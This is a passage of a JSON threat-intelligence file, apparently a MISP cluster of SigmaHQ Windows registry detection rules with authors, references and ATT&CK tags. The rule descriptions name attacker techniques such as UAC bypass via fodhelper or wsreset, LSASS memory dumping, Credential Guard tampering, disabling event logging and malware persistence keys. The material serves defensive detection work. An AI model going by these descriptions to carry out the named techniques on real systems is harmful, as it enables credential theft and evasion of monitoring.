Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", "meta": { "author": "Markus Neis, @markus_neis, Florian Roth", "creation_date": "2021-07-04", "falsepositive": [ "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], "filename": "registry_event_mimikatz_printernightmare.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", "https://nvd.nist.gov/vuln/detail/cve-2021-1675", "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", "https://nvd.nist.gov/vuln/detail/cve-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" ], "tags": [ "attack.execution", "attack.t1204", "cve.2021-1675", "cve.2021-34527" ] }, "related": [ { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "value": "PrinterNightmare Mimikatz Driver Name" }, { "description": "Detects persistence registry keys for Recycle Bin", "meta": { "author": "frack113", "creation_date": "2021-11-18", "falsepositive": [ "Unknown" ], "filename": "registry_event_persistence_recycle_bin.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://persistence-info.github.io/Data/recyclebin.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", "value": "Registry Persistence Mechanisms in Recycle Bin" }, { "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "registry_event_shell_open_keys_manipulation.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "attack.t1546.001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "value": "Shell Open Registry Keys Manipulation" }, { "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", "meta": { "author": "Avneet Singh @v3t0_, oscd.community", "creation_date": "2020-11-15", "falsepositive": [ "Legitimate modification of the registry key by legitimate program" ], "filename": "registry_event_runonce_persistence.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", "https://twitter.com/pabraeken/status/990717080805789697", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "value": "Run Once Task Configuration in Registry" }, { "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", "meta": { "author": "Dmitriy Lifanov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_narrator_feedback_persistance.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", "value": "Narrator's Feedback-Hub Persistence" }, { "description": "Sysmon registry detection of a local hidden user account.", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-05-03", "falsepositive": [ "Unknown" ], "filename": "registry_event_add_local_hidden_user.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1387530414185664538", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "value": "Creation of a Local Hidden User Account by Registry" }, { "description": "Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", "meta": { "author": "oscd.community, Dmitry Uchakin", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "registry_event_bypass_via_wsreset.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", "value": "UAC Bypass Via Wsreset" }, { "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", "meta": { "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" ], "tags": [ "attack.persistence", "attack.t1546.010" ] }, "related": [ { "dest-uuid": "cc89ecbd-3d33-4a41-bcca-001e702d18fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", "value": "New DLL Added to AppInit_DLLs Registry Key" }, { "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-20", "falsepositive": [ "Unknown" ], "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", "value": "Esentutl Volume Shadow Copy Service Keys" }, { "description": "Detects the presence of a registry key created during Azorult execution", "meta": { "author": "Trent Liffick", "creation_date": "2020-05-08", "falsepositive": [ "Unknown" ], "filename": "registry_event_mal_azorult.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" ], "tags": [ "attack.execution", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "value": "Registry Entries For Azorult Malware" }, { "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", "meta": { "author": "Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "registry_event_malware_qakbot_registry.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "value": "Potential Qakbot Registry Activity" }, { "description": "Detects the use of Windows Credential Editor (WCE)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-31", "falsepositive": [ "Unknown" ], "filename": "registry_event_hack_wce_reg.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.ampliasecurity.com/research/windows-credentials-editor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", "value": "Windows Credential Editor Registry" }, { "description": "Detects value modification of registry key containing path to binary used as screensaver.", "meta": { "author": "Bartlomiej Czyz @bczyz1, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate modification of screensaver" ], "filename": "registry_event_modify_screensaver_binary_path.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.002" ] }, "related": [ { "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", "value": "Path To Screensaver Binary Modified" }, { "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1182516740955226112", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "value": "Disable Security Events Logging Adding Reg Key MiniNt" }, { "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", "meta": { "author": "omkar72", "creation_date": "2020-10-25", "falsepositive": [ "Unlikely" ], "filename": "registry_event_office_test_regadd.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" ], "tags": [ "attack.persistence", "attack.t1137.002" ] }, "related": [ { "dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "value": "Office Application Startup - Office Test" }, { "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-01", "falsepositive": [ "Software installers downloaded and used by users" ], "filename": "registry_event_susp_download_run_key.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", "value": "Suspicious Run Key from Download" }, { "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Unknown" ], "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" ], "tags": [ "attack.resource-development", "attack.t1608" ] }, "related": [ { "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "value": "HybridConnectionManager Service Installation - Registry" }, { "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.\n", "meta": { "author": "iwillkeepwatch", "creation_date": "2019-01-18", "falsepositive": [ "Unknown" ], "filename": "registry_event_ssp_added_lsa_config.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" ], "tags": [ "attack.persistence", "attack.t1547.005" ] }, "related": [ { "dest-uuid": "5095a853-299c-4876-abd7-ac0050fb5462", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "value": "Security Support Provider (SSP) Added to LSA Configuration" }, { "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-26", "falsepositive": [ "Unlikely" ], "filename": "registry_event_silentprocessexit_lsass.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", "value": "Potential Credential Dumping Via LSASS SilentProcessExit Technique" }, { "description": "Detects Processes accessing the camera and microphone from suspicious folder", "meta": { "author": "Den Iuzvyk", "creation_date": "2020-06-07", "falsepositive": [ "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "filename": "registry_event_susp_mic_cam_access.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" ], "tags": [ "attack.collection", "attack.t1125", "attack.t1123" ] }, "related": [ { "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", "value": "Suspicious Camera and Microphone Access" }, { "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-08-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_disable_wdigest_credential_guard.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "value": "Wdigest CredGuard Registry Modification" }, { "description": "Detects actions caused by the RedMimicry Winnti playbook", "meta": { "author": "Alexander Rausch", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "registry_event_redmimicry_winnti_reg.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://redmimicry.com", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", "value": "RedMimicry Winnti Playbook Registry Manipulation" }, { "description": "Detects Pandemic Windows Implant", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-06-01", "falsepositive": [ "Unknown" ], "filename": "registry_event_apt_pandemic.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/MalwareJake/status/870349480356454401", "https://wikileaks.org/vault7/#Pandemic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "value": "Pandemic Registry Key" }, { "description": "Detects enabling of the \"AllowAnonymousCallback\" registry value, which allows a remote connection between computers that do not have a trust relationship.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-03", "falsepositive": [ "Administrative activity" ], "filename": "registry_set_enable_anonymous_connection.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d431012-2ab5-4db7-a84e-b29809da2172", "value": "Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback" }, { "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "meta": { "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "creation_date": "2018-03-15", "falsepositive": [ "Unlikely" ], "filename": "registry_event_stickykey_like_backdoor.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.008", "car.2014-11-003", "car.2014-11-008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", "value": "Sticky Key Like Backdoor Usage - Registry" }, { "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-16", "falsepositive": [ "Unknown" ], "filename": "registry_event_susp_lsass_dll_load.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1183745981189427200", "https://blog.xpnsec.com/exploring-mimikatz-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1547.008" ] }, "related": [ { "dest-uuid": "f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", "value": "DLL Load via LSASS" }, { "description": "Detects NetNTLM downgrade attack", "meta": { "author": "Florian Roth (Nextron Systems), wagga", "creation_date": "2018-03-20", "falsepositive": [ "Unknown" ], "filename": "registry_event_net_ntlm_downgrade.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "value": "NetNTLM Downgrade Attack - Registry" }, { "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", "meta": { "author": "omkar72", "creation_date": "2020-10-30", "falsepositive": [ "Unknown" ], "filename": "registry_event_runkey_winekey.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", "value": "WINEKEY Registry Modification" }, { "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { "author": "Nik Seetharaman", "creation_date": "2018-07-16", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "registry_event_cmstp_execution_by_registry.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.003", "attack.g0069", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", "value": "CMSTP Execution Registry Event" }, { "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment" ], "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/1008587936735035392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "value": "PUA - Sysinternals Tools Execution - Registry" }, { "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unlikely" ], "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml", "level": "high", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", "value": "Suspicious Execution Of 